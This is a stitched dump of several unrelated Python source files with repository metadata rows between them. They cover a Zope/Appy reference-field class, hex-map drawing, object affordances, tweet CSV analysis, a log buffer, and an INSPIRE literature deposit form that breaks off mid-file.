andName='%s_and' % operName">
<input type="radio" name=":operName" id=":orName" checked="checked"
value="or"/>
<label lfor=":orName">:_('search_or')"></label>
<input type="radio" name=":operName" id=":andName" value="and"/>
<label lfor=":andName">:_('search_and')"></label><br/>
</x>
<!-- The list of values -->
<select name=":widgetName" size=":field.sheight" multiple="multiple">
<option for="v in ztool.getSearchValues(name, className)"
var2="uid=v[0]; title=field.getReferenceLabel(v[1])" value=":uid"
title=":title">:ztool.truncateValue(title,field.swidth)"></option>
</select>
</x>''')
def __init__(self, klass=None, attribute=None, validator=None,
multiplicity=(0,1), default=None, add=False, addConfirm=False,
delete=None, noForm=False, link=True, unlink=None, back=None,
show=True, page='main', group=None, layouts=None,
showHeaders=False, shownInfo=(), select=None, maxPerPage=30,
move=0, indexed=False, searchable=False,
specificReadPermission=False, specificWritePermission=False,
width=None, height=5, maxChars=None, colspan=1, master=None,
masterValue=None, focus=False, historized=False, mapping=None,
label=None, queryable=False, queryFields=None, queryNbCols=1,
navigable=False, searchSelect=None, changeOrder=True,
sdefault='', scolspan=1, swidth=None, sheight=None):
self.klass = klass
self.attribute = attribute
# May the user add new objects through this ref ?
self.add = add
# When the user adds a new object, must a confirmation popup be shown?
self.addConfirm = addConfirm
# May the user delete objects via this Ref?
self.delete = delete
if delete == None:
# By default, one may delete objects via a Ref for which one can
# add objects.
self.delete = bool(self.add)
# If noForm is True, when clicking to create an object through this ref,
# the object will be created automatically, and no creation form will
# be presented to the user.
self.noForm = noForm
# May the user link existing objects through this ref?
self.link = link
# May the user unlink existing objects?
self.unlink = unlink
if unlink == None:
# By default, one may unlink objects via a Ref for which one can
# link objects.
self.unlink = bool(self.link)
self.back = None
if back:
# It is a forward reference
self.isBack = False
# Initialise the backward reference
self.back = back
self.backd = back.__dict__
back.isBack = True
back.back = self
back.backd = self.__dict__
# klass may be None in the case we are defining an auto-Ref to the
# same class as the class where this field is defined. In this case,
# when defining the field within the class, write
# myField = Ref(None, ...)
# and, at the end of the class definition (name it K), write:
# K.myField.klass = K
# setattr(K, K.myField.back.attribute, K.myField.back)
if klass: setattr(klass, back.attribute, back)
# When displaying a tabular list of referenced objects, must we show
# the table headers?
self.showHeaders = showHeaders
# When displaying referenced object(s), we will display its title + all
# other fields whose names are listed in the following attribute.
self.shownInfo = list(shownInfo)
if not self.shownInfo: self.shownInfo.append('title')
# If a method is defined in this field "select", it will be used to
# filter the list of available tied objects.
self.select = select
# Maximum number of referenced objects shown at once.
self.maxPerPage = maxPerPage
# Specifies sync
sync = {'view': False, 'edit':True}
# If param p_queryable is True, the user will be able to perform queries
# from the UI within referenced objects.
self.queryable = queryable
# Here is the list of fields that will appear on the search screen.
# If None is specified, by default we take every indexed field
# defined on referenced objects' class.
self.queryFields = queryFields
# The search screen will have this number of columns
self.queryNbCols = queryNbCols
# Within the portlet, will referred elements appear ?
self.navigable = navigable
# The search select method is used if self.indexed is True. In this
# case, we need to know among which values we can search on this field,
# in the search screen. Those values are returned by self.searchSelect,
# which must be a static method accepting the tool as single arg.
self.searchSelect = searchSelect
# If changeOrder is False, it even if the user has the right to modify
# the field, it will not be possible to move objects or sort them.
self.changeOrder = changeOrder
Field.__init__(self, validator, multiplicity, default, show, page,
group, layouts, move, indexed, False,
specificReadPermission, specificWritePermission, width,
height, None, colspan, master, masterValue, focus,
historized, sync, mapping, label, sdefault, scolspan,
swidth, sheight)
self.validable = self.link
def getDefaultLayouts(self):
return {'view': Table('l-f', width='100%'), 'edit': 'lrv-f'}
def isShowable(self, obj, layoutType):
res = Field.isShowable(self, obj, layoutType)
if not res: return res
# We add here specific Ref rules for preventing to show the field under
# some inappropriate circumstances.
if (layoutType == 'edit') and \
(self.mayAdd(obj) or not self.link): return False
if self.isBack:
if layoutType == 'edit': return False
else: return getattr(obj.aq_base, self.name, None)
return res
def getValue(self, obj, type='objects', noListIfSingleObj=False,
startNumber=None, someObjects=False):
'''Returns the objects linked to p_obj through this Ref field.
- If p_type is "objects", it returns the Appy wrappers;
- If p_type is "zobjects", it returns the Zope objects;
- If p_type is "uids", it returns UIDs of objects (= strings).
* If p_startNumber is None, it returns all referred objects.
* If p_startNumber is a number, it returns self.maxPerPage objects,
starting at p_startNumber.
If p_noListIfSingleObj is True, it returns the single reference as
an object and not as a list.
If p_someObjects is True, it returns an instance of SomeObjects
instead of returning a list of references.'''
uids = getattr(obj.aq_base, self.name, [])
if not uids:
# Maybe is there a default value?
defValue = Field.getValue(self, obj)
if defValue:
# I must prefix call to function "type" with "__builtins__"
# because this name was overridden by a method parameter.
if __builtins__['type'](defValue) in sutils.sequenceTypes:
uids = [o.o.UID() for o in defValue]
else:
uids = [defValue.o.UID()]
# Prepare the result: an instance of SomeObjects, that will be unwrapped
# if not required.
res = gutils.SomeObjects()
res.totalNumber = res.batchSize = len(uids)
batchNeeded = startNumber != None
if batchNeeded:
res.batchSize = self.maxPerPage
if startNumber != None:
res.startNumber = startNumber
# Get the objects given their uids
i = res.startNumber
while i < (res.startNumber + res.batchSize):
if i >= res.totalNumber: break
# Retrieve every reference in the correct format according to p_type
if type == 'uids':
ref = uids[i]
else:
ref = obj.getTool().getObject(uids[i])
if type == 'objects':
ref = ref.appy()
res.objects.append(ref)
i += 1
# Manage parameter p_noListIfSingleObj
if res.objects and noListIfSingleObj:
if self.multiplicity[1] == 1:
res.objects = res.objects[0]
if someObjects: return res
return res.objects
def getLinkedObjects(self, obj, startNumber=None):
'''Gets the objects linked to p_obj via this Ref field. If p_startNumber
is None, all linked objects are returned. If p_startNumber is a
number, self.maxPerPage objects will be returned, starting at
p_startNumber.'''
return self.getValue(obj, type='zobjects', someObjects=True,
startNumber=startNumber)
def getFormattedValue(self, obj, value, showChanges=False):
return value
def getIndexType(self): return 'ListIndex'
def getIndexValue(self, obj, forSearch=False):
'''Value for indexing is the list of UIDs of linked objects. If
p_forSearch is True, it will return a list of the linked objects'
titles instead.'''
if not forSearch:
res = getattr(obj.aq_base, self.name, [])
if res:
# The index does not like persistent lists.
res = list(res)
else:
# Ugly catalog: if I return an empty list, the previous value
# is kept.
res.append('')
return res
else:
# For the global search: return linked objects' titles.
res = [o.title for o in self.getValue(type='objects')]
if not res: res.append('')
return res
def validateValue(self, obj, value):
if not self.link: return None
# We only check "link" Refs because in edit views, "add" Refs are
# not visible. So if we check "add" Refs, on an "edit" view we will
# believe that that there is no referred object even if there is.
# If the field is a reference, we must ensure itself that multiplicities
# are enforced.
if not value:
nbOfRefs = 0
elif isinstance(value, basestring):
nbOfRefs = 1
else:
nbOfRefs = len(value)
minRef = self.multiplicity[0]
maxRef = self.multiplicity[1]
if maxRef == None:
maxRef = sys.maxint
if nbOfRefs < minRef:
return obj.translate('min_ref_violated')
elif nbOfRefs > maxRef:
return obj.translate('max_ref_violated')
def linkObject(self, obj, value, back=False):
'''This method links p_value (which can be a list of objects) to p_obj
through this Ref field.'''
# p_value can be a list of objects
if type(value) in sutils.sequenceTypes:
for v in value: self.linkObject(obj, v, back=back)
return
# Gets the list of referred objects (=list of uids), or create it.
obj = obj.o
refs = getattr(obj.aq_base, self.name, None)
if refs == None:
refs = obj.getProductConfig().PersistentList()
setattr(obj, self.name, refs)
# Insert p_value into it.
uid = value.o.UID()
if uid not in refs:
# Where must we insert the object? At the start? At the end?
if callable(self.add):
add = self.callMethod(obj, self.add)
else:
add = self.add
if add == 'start':
refs.insert(0, uid)
else:
refs.append(uid)
# Update the back reference
if not back: self.back.linkObject(value, obj, back=True)
def unlinkObject(self, obj, value, back=False):
'''This method unlinks p_value (which can be a list of objects) from
p_obj through this Ref field.'''
# p_value can be a list of objects
if type(value) in sutils.sequenceTypes:
for v in value: self.unlinkObject(obj, v, back=back)
return
obj = obj.o
refs = getattr(obj.aq_base, self.name, None)
if not refs: return
# Unlink p_value
uid = value.o.UID()
if uid in refs:
refs.remove(uid)
# Update the back reference
if not back: self.back.unlinkObject(value, obj, back=True)
def store(self, obj, value):
'''Stores on p_obj, the p_value, which can be:
* None;
* an object UID (=string);
* a list of object UIDs (=list of strings). Generally, UIDs or lists
of UIDs come from Ref fields with link:True edited through the web;
* a Zope object;
* a Appy object;
* a list of Appy or Zope objects.'''
# Standardize p_value into a list of Zope objects
objects = value
if not objects: objects = []
if type(objects) not in sutils.sequenceTypes: objects = [objects]
tool = obj.getTool()
for i in range(len(objects)):
if isinstance(objects[i], basestring):
# We have a UID here
objects[i] = tool.getObject(objects[i])
else:
# Be sure to have a Zope object
objects[i] = objects[i].o
uids = [o.UID() for o in objects]
# Unlink objects that are not referred anymore
refs = getattr(obj.aq_base, self.name, None)
if refs:
i = len(refs)-1
while i >= 0:
if refs[i] not in uids:
# Object having this UID must unlink p_obj
self.back.unlinkObject(tool.getObject(refs[i]), obj)
i -= 1
# Link new objects
if objects:
self.linkObject(obj, objects)
def mayAdd(self, obj):
'''May the user create a new referred object from p_obj via this Ref?'''
# We can't (yet) do that on back references.
if self.isBack: return No('is_back')
# Check if this Ref is addable
if callable(self.add):
add = self.callMethod(obj, self.add)
else:
add = self.add
if not add: return No('no_add')
# Have we reached the maximum number of referred elements?
if self.multiplicity[1] != None:
refCount = len(getattr(obj, self.name, ()))
if refCount >= self.multiplicity[1]: return No('max_reached')
# May the user edit this Ref field?
if not obj.allows(self.writePermission): return No('no_write_perm')
# Have the user the correct add permission?
tool = obj.getTool()
addPermission = '%s: Add %s' % (tool.getAppName(),
tool.getPortalType(self.klass))
folder = obj.getCreateFolder()
if not obj.getUser().has_permission(addPermission, folder):
return No('no_add_perm')
return True
def checkAdd(self, obj):
'''Compute m_mayAdd above, and raise an Unauthorized exception if
m_mayAdd returns False.'''
may = self.mayAdd(obj)
if not may:
from AccessControl import Unauthorized
raise Unauthorized("User can't write Ref field '%s' (%s)." % \
(self.name, may.msg))
def changeOrderEnabled(self, obj):
'''Is changeOrder enabled?'''
if isinstance(self.changeOrder, bool):
return self.changeOrder
else:
return self.callMethod(obj, self.changeOrder)
def getSelectableObjects(self, obj):
'''This method returns the list of all objects that can be selected to
be linked as references to p_obj via p_self.'''
if not self.select:
# No select method has been defined: we must retrieve all objects
# of the referred type that the user is allowed to access.
return obj.search(self.klass)
else:
return self.select(obj)
xhtmlToText = re.compile('<.*?>', re.S)
def getReferenceLabel(self, refObject):
'''p_self must have link=True. I need to display, on an edit view, the
p_refObject in the listbox that will allow the user to choose which
object(s) to link through the Ref. The information to display may
only be the object title or more if self.shownInfo is used.'''
res = ''
for fieldName in self.shownInfo:
refType = refObject.o.getAppyType(fieldName)
value = getattr(refObject, fieldName)
value = refType.getFormattedValue(refObject.o, value)
if refType.type == 'String':
if refType.format == 2:
value = self.xhtmlToText.sub(' ', value)
elif type(value) in sequenceTypes:
value = ', '.join(value)
prefix = ''
if res:
prefix = ' | '
res += prefix + value
maxWidth = self.width or 30
if len(res) > maxWidth:
res = res[:maxWidth-2] + '...'
return res
def getIndexOf(self, obj, refObj):
'''Gets the position of p_refObj within this field on p_obj.'''
uids = getattr(obj.aq_base, self.name, None)
if not uids: raise IndexError()
return uids.index(refObj.UID())
def autoref(klass, field):
'''klass.field is a Ref to p_klass. This kind of auto-reference can't be
declared in the "normal" way, like this:
class A:
attr1 = Ref(A)
because at the time Python encounters the static declaration
"attr1 = Ref(A)", class A is not completely defined yet.
This method allows to overcome this problem. You can write such
auto-reference like this:
class A:
attr1 = Ref(None)
autoref(A, A.attr1)
'''
field.klass = klass
setattr(klass, field.back.attribute, field.back)
# ------------------------------------------------------------------------------
|
UTF-8
|
Python
| false | false | 2,014 |
17,239,998,738,636 |
cab00fde249d7534a8ec6102e7a0e6daf1d5a358
|
59b0eb9e358107606a7a51e4c6da8f37f76a5ec1
|
/python/src/hexmapview/superhexterrain.py
|
534cb0e15f329bc0903841cfbe315ff120734e2c
|
[
"LGPL-2.1-or-later"
] |
non_permissive
|
markllama/hexgame-research
|
https://github.com/markllama/hexgame-research
|
4a88be4ebcac7c033a4ea682fca4371ce5be6f53
|
c88a1c77c5333c55b55d76098fa342165b896024
|
refs/heads/master
| 2020-12-24T14:00:39.489091 | 2013-12-30T01:43:39 | 2013-12-30T01:43:39 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from terrain import Terrain
class SuperHex(Terrain):
"""Draw a hex who's vertices are the centers of its neighbors"""
def repaint_location(self, loc):
"""Draw the border around the hex's location(s)"""
center = self._map.hexcenter(loc)
vertices = [self._map.hexcenter(n) for n in loc.neighbors]
coordinates = []
for v in vertices: coordinates.extend([v.x, v.y])
self._map.create_polygon(
coordinates,
fill="white",
outline="black",
tag=[self.name, "terrain", "(%d,%d)" % (loc.hx, loc.hy)]
)
|
UTF-8
|
Python
| false | false | 2,013 |
18,339,510,369,374 |
971b6e9e0b4b89ae6a658c4697a8ce66240b7d44
|
3d0c4321f86c3d875f449771245249bf458c3ade
|
/src/Enviroment/Objects.py
|
406bdec4ff395d8421eb362fb8b3a236a5756f5b
|
[] |
no_license
|
jakubkotrla/spacemap
|
https://github.com/jakubkotrla/spacemap
|
630bfea057afcef46b93cfe06450a9e6d7a78cab
|
08f27a285d742971806aef88b914316c3d3785b3
|
refs/heads/master
| 2021-01-10T10:29:42.144969 | 2009-04-17T06:20:34 | 2009-04-17T06:20:34 | 45,355,817 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
## @package Enviroment.Objects
# Contains list of object types available for worlds.
from Enviroment.Affordances import *
## Represents type of object, has affordances.
class Object:
def __init__(self, name, affs = []):
self.name = name
self.affordances = affs
def ToString(self):
strAff = ""
for aff in self.affordances: strAff = strAff + aff.name + ", "
return self.name + " (" + strAff + ")"
# Configuration part
WaypointObject = Object('Waypoint', [])
Meal = Object('Meal', [Eatability])
Sandwich = Object('Sandwich', [Eatability])
Apple = Object('Apple', [Eatability, Throwability])
Orange = Object('Orange', [Eatability, Throwability])
Sink = Object('Sink', [Wetability, Repairability])
Plate = Object('Plate', [Washability])
Cup = Object('Cup', [Washability])
Fork = Object('Fork', [Washability])
Knife = Object('Knife', [Washability, Cutability])
Pot = Object('Pot', [Washability])
Cover = Object('Cover', [Washability])
Book = Object('Book', [Readability])
Journal = Object('Journal', [Readability])
Newspapers = Object('Newspapers', [Readability])
Glasses = Object('Glasses', [Zoomability])
CocaColaCan = Object('CocaColaCan', [Drinkability])
BottleOfWine = Object('BottleOfWine', [Drinkability])
Television = Object('Television', [Watchability, Repairability])
Painting = Object('Painting', [Watchability])
Photoalbum = Object('Photoalbum', [Watchability])
Video = Object('Video', [Watchability, Repairability])
Flower = Object('Flower', [Watchability])
Chess = Object('Chess', [Playability])
Cards = Object('Cards', [Playability])
GameBoy = Object('GameBoy', [Playability])
Sofa = Object('Sofa', [Sitability])
Armchair = Object('Armchair', [Sitability])
Chair = Object('Chair', [Sitability])
Table = Object('Table', [Placeability, Repairability])
Shelf = Object('Shelf', [Placeability, Repairability])
Box = Object('Box', [Placeability, Repairability])
Door = Object('Door', [Exitability])
Hammer = Object('Hammer', [Hammerability])
Nail = Object('Nail', [Nailability])
Screwdriver = Object('Screwdriver', [Screwability])
Pipe = Object('Pipe', [Smokeability])
Wood = Object('Wood', [Fireability])
Torch = Object('Torch', [Lightability])
## List of all available object types.
Objects = [
Meal,
Sandwich,
Apple,
Orange,
Sink,
Plate,
Cup,
Fork,
Knife,
Pot,
Cover,
Book,
Journal,
Newspapers,
Glasses,
CocaColaCan,
BottleOfWine,
Television,
Painting,
Photoalbum,
Video,
Flower,
Sofa,
Armchair,
Table,
Shelf,
Box,
Door,
Hammer,
Nail,
Screwdriver,
Pipe,
Wood,
Torch
]
|
UTF-8
|
Python
| false | false | 2,009 |
13,451,837,610,383 |
1983cd225a8f5ee759c766bc713a5ce9a1bfdc1b
|
00abec481ba825ea9ee854c88e5a06143b871e23
|
/fluenpy/buffer.py
|
aff7e61dcdbdf45d7954c00022be7d8c5fe4ab8f
|
[] |
no_license
|
tagomoris/fluenpy
|
https://github.com/tagomoris/fluenpy
|
3c4d6060f12a8b3eb4a93e47694ea4f7705c8c11
|
730b7a934f4a35a887bcc3f102b7dbdbf359fa87
|
refs/heads/master
| 2021-01-15T19:13:37.057741 | 2012-04-30T07:19:32 | 2012-04-30T07:19:32 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# coding: utf-8
"""
fluenpy.buffer
~~~~~~~~~~~~~~
:copyright: (c) 2012 by INADA Naoki
:license: Apache v2
"""
from __future__ import print_function, division, absolute_import, with_statement
import logging
log = logging.getLogger(__name__)
from fluenpy import error
from fluenpy.config import Configurable, config_param
from collections import defaultdict
import gevent.queue as gqueue
import gevent
class BaseBufferChunk(object):
def __init__(self, key):
self.key = key
def __iadd__(self, data):
"""Append *data* to this chunk."""
raise NotImplemented
def __len__(self):
"""Return bytesize of this chunk."""
raise NotImplemented
def purge(self):
"""Called when throw away this chunk."""
pass
class BaseBuffer(Configurable):
buffer_chunk_limit = config_param('size', 128*1024*1024)
buffer_queue_limit = config_param('integer', 128)
flush_interval = config_param('time', 1)
_shutdown = False
#Override this.
chunk_class = None
def start(self):
self._queue = gqueue.Queue(self.buffer_queue_limit)
self._map = defaultdict(self.chunk_class)
gevent.spawn(self.run)
def run(self):
while not self._shutdown:
# todo: flush にかかった時間に応じて次の sleep 時間を引く.
gevent.sleep(self.flush_interval)
self.flush()
def emit(self, key, data, chain):
top = self._map.get(key)
if not top:
top = self._map[key] = self.chunk_class(key)
if len(top) + len(data) <= self.buffer_chunk_limit:
chain.next()
top += data
return False
if len(data) > self.buffer_chunk_limit:
log.warn("Size of the emitted data exceeds buffer_chunk_limit.\n"
"This may occur problems in the output plugins ``at this server.``\n"
"To avoid problems, set a smaller number to the buffer_chunk_limit\n"
"in the forward output ``at the log forwarding server.``"
)
nc = self.chunk_class(key)
try:
nc += data
self._queue.put_nowait(top)
self._map[key] = nc
chain.next() # What is chain?
return self._queue.qsize() == 1
except gqueue.Full:
log.error("buffer_queue_limit is exceeded.")
nc.purge()
except:
nc.purge()
raise
def keys(self):
return self._map.keys()
def flush(self):
log.debug("flush: keys=%s", self._map.keys())
map_ = self._map
keys = list(map_.keys())
for key in keys:
chunk = map_.pop(key)
self._queue.put(chunk) # Would block here.
log.debug("flush: queue=%s", self._queue.qsize())
def get(self, block=True, timeout=None):
return self._queue.get(block, timeout)
def get_nowait(self):
return self._queue.get_nowait()
def shutdown(self):
self._shutdown = True
self.flush()
|
UTF-8
|
Python
| false | false | 2,012 |
4,930,622,487,731 |
0bbbbb761fc65daa2b597a485c9ebf8c94ca48d4
|
0e1f85ec1aec20e2ac42bae81c59d809b6a3abfa
|
/analyzer/base.py
|
160955f7dbdad424bb4d5fb32a949a09d6dd99ca
|
[] |
no_license
|
canerturkmen/tweetcrawl
|
https://github.com/canerturkmen/tweetcrawl
|
4e44be8fb4e5bed22d1d33c47c17361fd0e5eaef
|
778957c2924ba95cecd3659ab706a19b1199b685
|
refs/heads/master
| 2016-09-06T00:43:59.384907 | 2013-08-03T07:02:14 | 2013-08-03T07:02:14 | 11,071,716 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null |
"""
Analysis for CSV data dumped out of mongodb
"""
import copy
import csv
import random
import re
import sys
# ['created_at', 'entities.hashtags', 'favorite_count', 'text', 'retweet_count', 'user.id', 'user.screen_name']
def revise_norm_1():
with open('/Users/Caner/Desktop/norm.csv') as read:
with open('/Users/Caner/Desktop/norm2.csv', 'wb') as out:
reader = csv.reader(read, delimiter=',', quotechar='"')
writer = csv.writer(out,delimiter=',', quoting=csv.QUOTE_MINIMAL )
for r in reader:
pass
def generate_norm_1():
users = {}
sw = []
with open('/Users/Caner/Downloads/stop-words/stop-words-turkish.txt') as words:
reader = csv.reader(words)
for r in reader:
sw.append(r[0])
results = []
vocab = {}
print sw
with open("/Users/Caner/Scrapes/tweet/tweets.csv") as file:
with open('/Users/Caner/Desktop/norm_sample8.csv', 'wb') as out:
reader = csv.reader(file, delimiter=",", quotechar='"')
writer = csv.writer(out , delimiter=',',quotechar='|', quoting=csv.QUOTE_MINIMAL)
for r in reader:
if not users.get(r[5]):
users[r[5]] = []
users[r[5]].append(r[3])
else:
users[r[5]].append(r[3])
user_sample = random.sample(users.keys(), 1000)
i = 0
for key in user_sample:
for a in users.get(key):
txt = re.sub(r'(http\S*)', '', a) # take out links
txt = re.sub("\n", " ", txt)
txt = re.sub("\t", " ", txt)
rex = re.compile(r'[,|.|!|\?| |;|\||\'|\"|\)|\(|:]')
wordlist = rex.split(txt)
wordlist2 = []
for w in wordlist:
if w not in sw and len(w) > 2 and w[0] != "@": # take out stopwords
wordlist2.append(w.lower())
for w in wordlist2:
a = [key, i, w]
results.append(a)
writer.writerow(a)
i+=1
total_vocab = {}
for r in results:
total_vocab[r[2]] = 0
matrix = {}
for r in results:
if not matrix.get(r[0]):
matrix[r[0]] = copy.copy(total_vocab)
matrix[r[0]][r[2]] = 1
with open('/Users/Caner/Desktop/mx_out4.csv', 'wb') as outmatrix:
matrixwriter = csv.writer(outmatrix, delimiter=',',quotechar='"', quoting=csv.QUOTE_MINIMAL)
for m in matrix:
row = []
for i in sorted(total_vocab.keys()):
row.append(matrix.get(m).get(i))
matrixwriter.writerow(row)
def learn_dates():
"""
Get unique dates in the csv dump
"""
ls = {}
with open("/Users/Caner/Scrapes/tweet/tweets.csv") as file:
reader = csv.reader(file, delimiter=",", quotechar='"')
for r in reader:
# Mon Jul 22 19:59:01 +0000 2013
ls[r[0][4:10]] = ""
print ls.keys()
def get_unique_users():
"""
Number of unique users who tweeted
"""
ls = {}
with open("/Users/Caner/Scrapes/tweet/tweets.csv") as file:
reader = csv.reader(file, delimiter=",", quotechar='"')
for r in reader:
# Mon Jul 22 19:59:01 +0000 2013
#ls[r[0][4:10]] = ""
ls[r[0]] = ""
print len(reader)
generate_norm_1()
print "Done"
|
UTF-8
|
Python
| false | false | 2,013 |
7,164,005,489,721 |
dc92b5505e0fa350d0eb4857f0be8b400d138b48
|
e9185cc2c7a053e4088ba20ee294e931d378f338
|
/loader/models.py
|
33006bf7568df51a3e61063776f3949c50e7b89f
|
[] |
no_license
|
19/kavak
|
https://github.com/19/kavak
|
a93103d38ff2be4165c29d30819a991f971295c0
|
5c4d9d7e7839dde9a1ba667d027d6a1257c643aa
|
refs/heads/master
| 2015-08-02T04:57:13.962548 | 2013-06-09T19:25:47 | 2013-06-09T19:25:47 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from google.appengine.ext import db
class Person(db.Model):
Email = db.StringProperty()
Role = db.StringProperty()
FirstName = db.StringProperty()
LastName = db.StringProperty()
Gid = db.StringProperty()
GradeAverage = db.StringProperty()
class Project(db.Model):
Name = db.StringProperty()
Scount = db.StringProperty()
|
UTF-8
|
Python
| false | false | 2,013 |
2,345,052,172,434 |
ad2349db391acfc5657289818aac0b986dd217ea
|
a346794889f7c8246742772dc56ee6404b78c3f6
|
/python/lxilff/dev.py
|
6f714f47e3e9227d271e86889ed8e1b43d62b354
|
[] |
no_license
|
lusionx/lusionkit
|
https://github.com/lusionx/lusionkit
|
cd415371350be35ca6d98ff86230ed7aa51e20b6
|
2a5fd1f302201913c9489c63afe5db635366c83c
|
refs/heads/master
| 2021-01-21T11:45:16.314068 | 2013-05-17T06:01:36 | 2013-05-17T06:01:36 | 32,775,770 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# -*- coding: utf-8 -*-
#!/usr/bin/env python
from google.appengine.ext import webapp
from google.appengine.ext.webapp import util
import web3
from google.appengine.ext.db import djangoforms
from model import anime
class ItemForm(djangoforms.ModelForm):
class Meta:
model = anime.Main
url = {}
url['/dev'] = 'MainHandler'
class MainHandler(webapp.RequestHandler):
def get(self):
f = ItemForm()
#self.response.out.write(dir(f))
self.response.out.write(f.as_p().replace('<p>','<div>').replace('</p>','</div>'))
if __name__ == '__main__':
web3.run(url,globals())
|
UTF-8
|
Python
| false | false | 2,013 |
7,430,293,457,918 |
3b88a821e4888333e393356317ae5e6cd05f810f
|
3b0d284ac8fe979e0ea8c5bfd6d4ed9228c52b69
|
/inspire/modules/deposit/workflows/literature.py
|
e7215dc993a3e635a528124044a9cf0be5810dba
|
[
"GPL-2.0-only"
] |
non_permissive
|
pedrogaudencio/inspire-next
|
https://github.com/pedrogaudencio/inspire-next
|
debb1583a290ddb02ce3969abe6b527f3c922190
|
13ede4ef80728f889b64966ee5214e1d438cc1ba
|
refs/heads/sprint-1
| 2021-01-14T14:22:49.135024 | 2014-05-27T15:21:15 | 2014-05-28T16:34:31 | 17,870,297 | 0 | 0 | null | true | 2014-06-18T14:13:39 | 2014-03-18T15:05:56 | 2014-06-18T14:13:26 | 2014-06-18T14:13:26 | 1,469 | 0 | 0 | 0 |
Python
| null | null |
#
## This file is part of INSPIRE.
## Copyright (C) 2014 CERN.
##
## INSPIRE is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## INSPIRE is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with INSPIRE; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
#
from wtforms import validators
from lxml.html import fromstring
from wtforms.widgets import html_params, HTMLString
from flask_wtf import RecaptchaField
from invenio.modules.deposit.types import SimpleRecordDeposition
from invenio.modules.deposit.form import WebDepositForm
from invenio.base.i18n import _
from invenio.modules.deposit import fields
from invenio.modules.deposit.field_widgets import plupload_widget, \
ColumnInput, \
ExtendedListWidget, \
ItemWidget
from invenio.modules.deposit.tasks import render_form, \
create_recid, \
prepare_sip, \
finalize_record_sip, \
upload_record_sip, \
prefill_draft, \
process_sip_metadata, \
hold_for_approval
from inspire.modules.deposit import fields as inspire_fields
#
# Helpers
#
def filter_empty_helper(keys=None):
"""Remove empty elements from a list."""
def _inner(elem):
if isinstance(elem, dict):
for k, v in elem.items():
if (keys is None or k in keys) and v:
return True
return False
else:
return bool(elem)
return _inner
#
# Field class names
#
article_class = " article-related"
thesis_class = " thesis-related"
chapter_class = " chapter-related"
book_class = " book-related"
proceedings_class = " proceedings-related"
#
# Custom field widgets
#
def radiochoice_buttons(field, **dummy_kwargs):
"""Radio choice buttons."""
html = ''
for choice, value in field.choices:
html += u'<label class="btn btn-default"> \
<input type="radio" name="%s" id="%s"> \
%s</label>' % (choice, choice, value)
html = [u'<div class="btn-group" data-toggle="buttons">' + html + u'</div>']
return HTMLString(u''.join(html))
def importdata_button(field, **dummy_kwargs):
"""Import data button."""
html = u'<button %s data-loading-text="%s">%s</button>' % \
(html_params(style="float:right; width: 160px;",
id="importData",
class_="btn btn-primary btn-large",
name="importData",
type="button"),
_('Importing data...'),
field.label.text)
return HTMLString(html)
def defensedate_widget(field, **kwargs):
"""Date widget fot thesis."""
field_id = kwargs.pop('id', field.id)
html = [u'<div class="row %s"><div class="col-xs-5 col-sm-3">\
<input class="datepicker form-control" %s type="text">\
</div></div'
% (thesis_class, html_params(id=field_id,
name=field_id,
value=field.data or ''))]
return HTMLString(u''.join(html))
#
# Forms
#
class AuthorInlineForm(WebDepositForm):
"""Author inline form."""
name = fields.TextField(
placeholder=_("Family name, First name"),
widget_classes='form-control',
widget=ColumnInput(class_="col-xs-6"),
# validators=[
# validators.Required(),
# ],
export_key='full_name',
)
affiliation = fields.TextField(
placeholder=_("Affiliation"),
widget_classes='form-control',
widget=ColumnInput(class_="col-xs-4 col-pad-0"),
export_key='affiliation',
)
class LiteratureForm(WebDepositForm):
"""Literature form fields."""
# captcha = RecaptchaField()
doi = fields.DOIField(
label=_('DOI'),
icon='fa fa-barcode fa-fw',
processors=[],
export_key='doi'
)
arxiv_id = fields.TextField(
label=_('ArXiv ID'),
widget_classes='form-control',
)
isbn = fields.TextField(
label=_('ISBN'),
widget_classes='form-control',
)
import_source = fields.SubmitField(
label=_('Import data'),
widget=importdata_button,
)
types_of_doc = [("article", _("Article/Conference paper")),
("thesis", _("Thesis")),
("chapter", _("Book Chapter")),
("book", _("Book")),
("proceedings", _("Proceedings"))]
type_of_doc = fields.SelectField(
label='Type of document',
choices=types_of_doc,
default="article",
#widget=radiochoice_buttons,
widget_classes='form-control',
validators=[validators.Required()],
description='Required.',
)
title = fields.TitleField(
label=_('Original Title'),
description='Required.',
icon='fa fa-book fa-fw',
widget_classes="form-control",
validators=[validators.Required()],
export_key='title',
)
authors = fields.DynamicFieldList(
fields.FormField(
AuthorInlineForm,
widget=ExtendedListWidget(
item_widget=ItemWidget(),
html_tag='div',
),
),
label='Authors',
add_label='Add another author',
description='Required.',
icon='fa fa-user fa-fw',
min_entries=1,
widget_classes='',
export_key='authors',
validators=[validators.Required()],
)
collaboration = fields.TextField(
label=_('Collaboration'),
widget_classes="form-control"
)
experiment = fields.TextField(
label=_('Experiment'),
#choices=,
widget_classes="form-control"
)
# this should be a prefilled dropdown
subject = fields.TextField(
label=_('Subject'),
widget_classes="form-control",
export_key='subject_term',
)
abstract = fields.TextAreaField(
label=_('Abstract'),
default='',
icon='fa fa-pencil fa-fw',
widget_classes="form-control",
export_key='abstract',
)
page_nr = fields.TextField(
label=_('Number of pages'),
widget_classes="form-control",
export_key='page_nr'
)
languages = [("en", _("English")),
("fre", _("French")),
("ger", _("German")),
("dut", _("Dutch")),
("ita", _("Italian")),
("spa", _("Spanish")),
("por", _("Portuguese")),
("gre", _("Greek")),
("slo", _("Slovak")),
("cze", _("Czech")),
("hun", _("Hungarian")),
("pol", _("Polish")),
("nor", _("Norwegian")),
("swe", _("Swedish")),
